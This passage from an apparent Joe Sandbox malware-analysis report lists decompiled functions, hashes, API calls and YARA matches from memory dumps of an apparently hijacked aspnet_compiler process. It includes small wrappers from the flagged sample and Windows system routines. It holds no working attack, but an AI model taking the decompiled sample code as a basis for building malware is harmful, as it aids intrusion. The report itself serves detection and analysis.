                                                  • Instruction Fuzzy Hash: 5DE01AB12002056BDB14DF55CC49EE777A9AF88750F014559F9195B241C631E910CAA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004188F0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 294 4188f0-418906 295 41890c-418921 RtlFreeHeap 294->295 296 418907 call 4191e0 294->296 296->295
                                                  C-Code - Quality: 100%
                                                  			E004188F0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191E0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                  0x004188ff
                                                  0x00418907
                                                  0x0041891d
                                                  0x00418921

                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                  • Instruction ID: 4eb6e808868848e44fc4af0a2d328e43ee2ba6839a30e24a5e1d9ea2c08b961d
                                                  • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                  • Instruction Fuzzy Hash: 6BE012B1200209ABDB18EF99CC49EA777ACAF88750F018559FA085B242CA30E910CAB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00418A4D Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 297 418a4d-418a6a call 4191e0 300 418a6f-418a84 LookupPrivilegeValueW 297->300
                                                  C-Code - Quality: 79%
                                                  			E00418A4D(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				asm("adc eax, 0x8b555e52");
				_t7 = _a4;
				_t3 = _t7 + 0xc8c; // 0xcf4
				E004191E0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                  0x00418a4d
                                                  0x00418a53
                                                  0x00418a62
                                                  0x00418a6a
                                                  0x00418a80
                                                  0x00418a84

                                                  APIs
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LookupPrivilegeValue
                                                  • String ID:
                                                  • API String ID: 3899507212-0
                                                  • Opcode ID: 6732f8c23b21ed8da6f57f13e425359443a03f7d29145e95926f123d372d236a
                                                  • Instruction ID: 3c3e9531d8bfe0ef19fc57a75080743895c52edbdeaa2fcdcdfd7c18488a4c89
                                                  • Opcode Fuzzy Hash: 6732f8c23b21ed8da6f57f13e425359443a03f7d29145e95926f123d372d236a
                                                  • Instruction Fuzzy Hash: 0CE01AB16042046BDB10DF95DC85FEB37A9AF88250F118165F90C97241C935E951CBB4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00418A50 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 301 418a50-418a84 call 4191e0 LookupPrivilegeValueW
                                                  C-Code - Quality: 100%
                                                  			E00418A50(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				_t3 = _a4 + 0xc8c; // 0xcf4
				E004191E0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                  0x00418a62
                                                  0x00418a6a
                                                  0x00418a80
                                                  0x00418a84

                                                  APIs
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LookupPrivilegeValue
                                                  • String ID:
                                                  • API String ID: 3899507212-0
                                                  • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                  • Instruction ID: 6b795ac81b365ad13cf9f2a9b204a9737006b755962b409e964d21a2d06fa60d
                                                  • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                  • Instruction Fuzzy Hash: 62E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FA0857241C934E950CBF5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00418930 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00418930(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004191E0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                  0x00418933
                                                  0x0041894a
                                                  0x00418958

                                                  APIs
                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitProcess
                                                  • String ID:
                                                  • API String ID: 621844428-0
                                                  • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                  • Instruction ID: c6ffa8f41277cedcd146721b33de4ab2dd662f0a832426917f21051448e796de
                                                  • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                  • Instruction Fuzzy Hash: 90D012716042147BD620DB99CC85FD7779CDF48790F018065FA1C5B241C531BA00C6E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018C967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 7b43fb82e9c77e774f0459a7450d81de7f4dacc37f45eac1f227a52c1ce979e6
                                                  • Instruction ID: 5f23d0c8a52343d38cef708e2bcf3d7f9f5a10550164e4b3a36013350d9a0ef4
                                                  • Opcode Fuzzy Hash: 7b43fb82e9c77e774f0459a7450d81de7f4dacc37f45eac1f227a52c1ce979e6
                                                  • Instruction Fuzzy Hash: E4B09B71D415C5C5D611D7A44608B177A0077D0745F17C155D2024795B4778C195F6B5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 0193B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0193B47D
                                                  • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0193B53F
                                                  • Go determine why that thread has not released the critical section., xrefs: 0193B3C5
                                                  • *** then kb to get the faulting stack, xrefs: 0193B51C
                                                  • *** enter .cxr %p for the context, xrefs: 0193B50D
                                                  • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0193B484
                                                  • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0193B323
                                                  • *** enter .exr %p for the exception record, xrefs: 0193B4F1
                                                  • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0193B2F3
                                                  • The resource is owned shared by %d threads, xrefs: 0193B37E
                                                  • an invalid address, %p, xrefs: 0193B4CF
                                                  • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0193B3D6
                                                  • *** Inpage error in %ws:%s, xrefs: 0193B418
                                                  • write to, xrefs: 0193B4A6
                                                  • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0193B38F
                                                  • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0193B2DC
                                                  • <unknown>, xrefs: 0193B27E, 0193B2D1, 0193B350, 0193B399, 0193B417, 0193B48E
                                                  • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0193B39B
                                                  • The instruction at %p tried to %s , xrefs: 0193B4B6
                                                  • The instruction at %p referenced memory at %p., xrefs: 0193B432
                                                  • This failed because of error %Ix., xrefs: 0193B446
                                                  • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0193B314
                                                  • a NULL pointer, xrefs: 0193B4E0
                                                  • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0193B305
                                                  • The resource is owned exclusively by thread %p, xrefs: 0193B374
                                                  • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0193B476
                                                  • read from, xrefs: 0193B4AD, 0193B4B2
                                                  • *** Resource timeout (%p) in %ws:%s, xrefs: 0193B352
                                                  • The critical section is owned by thread %p., xrefs: 0193B3B9
                                                  • *** An Access Violation occurred in %ws:%s, xrefs: 0193B48F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                  • API String ID: 0-108210295
                                                  • Opcode ID: d8e476613f414e8fb165ce63d23a9b9dd0f81aa9ad82521bf0c5635cd3bca68d
                                                  • Instruction ID: ba6cb8adbc45518abda3eca292ce1f02caea69b415d02be514fe218715092b58
                                                  • Opcode Fuzzy Hash: d8e476613f414e8fb165ce63d23a9b9dd0f81aa9ad82521bf0c5635cd3bca68d
                                                  • Instruction Fuzzy Hash: 3C812B31A41210FFEB225A4ACC8AD7B3F2AEFD7B52F024148F50DAB212D265C641C772
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01893D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 96%
                                                  			E01893D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01891B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01891B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01891B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01891B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01891B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L018A4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E018CF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E018D1370(_t276, 0x1864e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E018CBB40(0,  &_v68, _t170);
									if(L018943C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E018CBB40(_t257,  &_v68, _t243);
								if(L018943C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E018D1370(_t278, 0x1864e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L018A4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E018CF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E018D1370(_v16, 0x1864e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E018CBB40(_t262,  &_v68, _t244);
								if(L018943C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E018D1370(_t282, 0x1864e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E018CBB40(_t262,  &_v68, _t201);
							if(L018943C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L018A4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E018CF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E018D1370(_t280, 0x1864e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E018CBB40(_t267,  &_v68, _t245);
							if(L018943C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E018D1370(_t284, 0x1864e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E018CBB40(_t267,  &_v68, _t224);
						if(L018943C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                  0x01893d3c
                                                  0x01893d42
                                                  0x01893d44
                                                  0x01893d46
                                                  0x01893d49
                                                  0x01893d4c
                                                  0x01893d4f
                                                  0x01893d52
                                                  0x01893d55
                                                  0x01893d58
                                                  0x01893d5b
                                                  0x01893d5f
                                                  0x01893d61
                                                  0x01893d66
                                                  0x018e8213
                                                  0x018e8218
                                                  0x01894085
                                                  0x01894088
                                                  0x0189408e
                                                  0x01894094
                                                  0x0189409a
                                                  0x018940a0
                                                  0x018940a6
                                                  0x018940a9
                                                  0x018940af
                                                  0x018940b6
                                                  0x018940bd
                                                  0x018940bd
                                                  0x01893d83
                                                  0x018e821f
                                                  0x018e8229
                                                  0x018e8238
                                                  0x018e8238
                                                  0x018e823d
                                                  0x018e823d
                                                  0x01893da0
                                                  0x01893daf
                                                  0x01893db5
                                                  0x01893dba
                                                  0x01893dba
                                                  0x01893dd4
                                                  0x01893e94
                                                  0x01893eab
                                                  0x01893f6d
                                                  0x01893f84
                                                  0x0189406b
                                                  0x0189406b
                                                  0x0189406e
                                                  0x0189406e
                                                  0x01894070
                                                  0x01894074
                                                  0x018e8351
                                                  0x018e8351
                                                  0x0189407a
                                                  0x0189407f
                                                  0x018e835d
                                                  0x018e8370
                                                  0x018e8377
                                                  0x018e8379
                                                  0x018e837c
                                                  0x018e837c
                                                  0x018e835d
                                                  0x00000000
                                                  0x0189407f
                                                  0x01893f8a
                                                  0x01893f8d
                                                  0x01893f90
                                                  0x01893f95
                                                  0x018e830d
                                                  0x018e830f
                                                  0x01893f9b
                                                  0x01893fac
                                                  0x01893fae
                                                  0x01893fb1
                                                  0x01893fb1
                                                  0x01893fb6
                                                  0x018e8317
                                                  0x018e831a
                                                  0x00000000
                                                  0x01893fbc
                                                  0x01893fc1
                                                  0x01893fc9
                                                  0x01893fd7
                                                  0x01893fda
                                                  0x01893fdd
                                                  0x01894021
                                                  0x01894021
                                                  0x01894029
                                                  0x01894030
                                                  0x01894044
                                                  0x01894046
                                                  0x01894046
                                                  0x01894044
                                                  0x01894049
                                                  0x018e8327
                                                  0x018e8334
                                                  0x018e8339
                                                  0x018e833c
                                                  0x0189404f
                                                  0x0189404f
                                                  0x0189404f
                                                  0x01894051
                                                  0x01894056
                                                  0x01894063
                                                  0x01894063
                                                  0x01894068
                                                  0x00000000
                                                  0x01894068
                                                  0x01893fdf
                                                  0x01893fe2
                                                  0x01893fe4
                                                  0x01893fe7
                                                  0x01893fef
                                                  0x01894003
                                                  0x01894005
                                                  0x01894005
                                                  0x0189400c
                                                  0x01894013
                                                  0x01894016
                                                  0x01894017
                                                  0x0189401b
                                                  0x0189401e
                                                  0x00000000
                                                  0x0189401e
                                                  0x01893fb6
                                                  0x01893eb1
                                                  0x01893eb4
                                                  0x01893eb7
                                                  0x01893ebc
                                                  0x018e82a9
                                                  0x018e82ab
                                                  0x01893ec2
                                                  0x01893ed3
                                                  0x01893ed5
                                                  0x01893ed8
                                                  0x01893ed8
                                                  0x01893edd
                                                  0x018e82b3
                                                  0x018e82b6
                                                  0x00000000
                                                  0x01893ee3
                                                  0x01893ee8
                                                  0x01893eed
                                                  0x01893ef0
                                                  0x01893ef3
                                                  0x01893f02
                                                  0x01893f05
                                                  0x01893f08
                                                  0x018e82c0
                                                  0x018e82c3
                                                  0x018e82c5
                                                  0x018e82c8
                                                  0x018e82d0
                                                  0x018e82e4
                                                  0x018e82e6
                                                  0x018e82e6
                                                  0x018e82ed
                                                  0x018e82f4
                                                  0x018e82f7
                                                  0x018e82f8
                                                  0x018e82fc
                                                  0x018e82ff
                                                  0x018e82ff
                                                  0x01893f0e
                                                  0x01893f11
                                                  0x01893f16
                                                  0x01893f1d
                                                  0x01893f31
                                                  0x018e8307
                                                  0x018e8307
                                                  0x01893f31
                                                  0x01893f39
                                                  0x01893f48
                                                  0x01893f4d
                                                  0x01893f50
                                                  0x01893f50
                                                  0x01893f53
                                                  0x01893f58
                                                  0x01893f65
                                                  0x01893f65
                                                  0x01893f6a
                                                  0x00000000
                                                  0x01893f6a
                                                  0x01893edd
                                                  0x01893dda
                                                  0x01893ddd
                                                  0x01893de0
                                                  0x01893de5
                                                  0x018e8245
                                                  0x01893deb
                                                  0x01893df7
                                                  0x01893dfc
                                                  0x01893dfe
                                                  0x01893e01
                                                  0x01893e01
                                                  0x01893e06
                                                  0x018e824d
                                                  0x018e824f
                                                  0x018e8254
                                                  0x00000000
                                                  0x01893e0c
                                                  0x01893e11
                                                  0x01893e16
                                                  0x01893e19
                                                  0x01893e29
                                                  0x01893e2c
                                                  0x01893e2f
                                                  0x018e825c
                                                  0x018e825f
                                                  0x018e8261
                                                  0x018e8264
                                                  0x018e826c
                                                  0x018e8280
                                                  0x018e8282
                                                  0x018e8282
                                                  0x018e8289
                                                  0x018e8290
                                                  0x018e8293
                                                  0x018e8294
                                                  0x018e8298
                                                  0x018e829b
                                                  0x018e829b
                                                  0x01893e35
                                                  0x01893e38
                                                  0x01893e3d
                                                  0x01893e44
                                                  0x01893e58
                                                  0x018e82a3
                                                  0x018e82a3
                                                  0x01893e58
                                                  0x01893e60
                                                  0x01893e6f
                                                  0x01893e74
                                                  0x01893e77
                                                  0x01893e77
                                                  0x01893e7a
                                                  0x01893e7f
                                                  0x01893e8c
                                                  0x01893e8c
                                                  0x01893e91
                                                  0x00000000
                                                  0x01893e91

                                                  Strings
                                                  • WindowsExcludedProcs, xrefs: 01893D6F
                                                  • Kernel-MUI-Language-Disallowed, xrefs: 01893E97
                                                  • Kernel-MUI-Number-Allowed, xrefs: 01893D8C
                                                  • Kernel-MUI-Language-SKU, xrefs: 01893F70
                                                  • Kernel-MUI-Language-Allowed, xrefs: 01893DC0
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                  • API String ID: 0-258546922
                                                  • Opcode ID: 6ccd8a33fb419c7304dfab3180aa6854df314635862963d7697440a3e2c8a354
                                                  • Instruction ID: 55d84769e7ee53ee314d4fc6b067bb29345b25dbb2079a7681b300bdd4c7b668
                                                  • Opcode Fuzzy Hash: 6ccd8a33fb419c7304dfab3180aa6854df314635862963d7697440a3e2c8a354
                                                  • Instruction Fuzzy Hash: 82F11A72D00619EBDF11DFA8C984AAEBBB9FF59750F14006AE905E7210E7759F01CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018840E1 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 29%
                                                  			E018840E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0188B150();
					} else {
						E0188B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0188B150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E0188B150(", passed to %s", _t29);
					}
					_push("\n");
					E0188B150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1976378 = 1;
						asm("int3");
						 *0x1976378 = 0;
					}
					return 0;
				}
				return 1;
			}





                                                  0x018840e6
                                                  0x018840e8
                                                  0x018840f1
                                                  0x018e042d
                                                  0x018e044c
                                                  0x018e0451
                                                  0x018e042f
                                                  0x018e0444
                                                  0x018e0449
                                                  0x018e045d
                                                  0x018e0466
                                                  0x018e046e
                                                  0x018e0474
                                                  0x018e0475
                                                  0x018e047a
                                                  0x018e048a
                                                  0x018e048c
                                                  0x018e0493
                                                  0x018e0494
                                                  0x018e0494
                                                  0x00000000
                                                  0x018e049b
                                                  0x00000000

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                  • API String ID: 0-188067316
                                                  • Opcode ID: 4e68f80aa80a2e9d60015890c5e3ae9aa955ddb6eb49aa2cf09bafca1fe000a4
                                                  • Instruction ID: 63d7ba57724fa5edaacb9dc62793dec2978aeb9f6606fddc6f459e6586da982e
                                                  • Opcode Fuzzy Hash: 4e68f80aa80a2e9d60015890c5e3ae9aa955ddb6eb49aa2cf09bafca1fe000a4
                                                  • Instruction Fuzzy Hash: 9F012836204A81DEE225A76DA58DF5677E8DB82F38F28443DF004CB751DAE89640C211
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 019449A4 Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
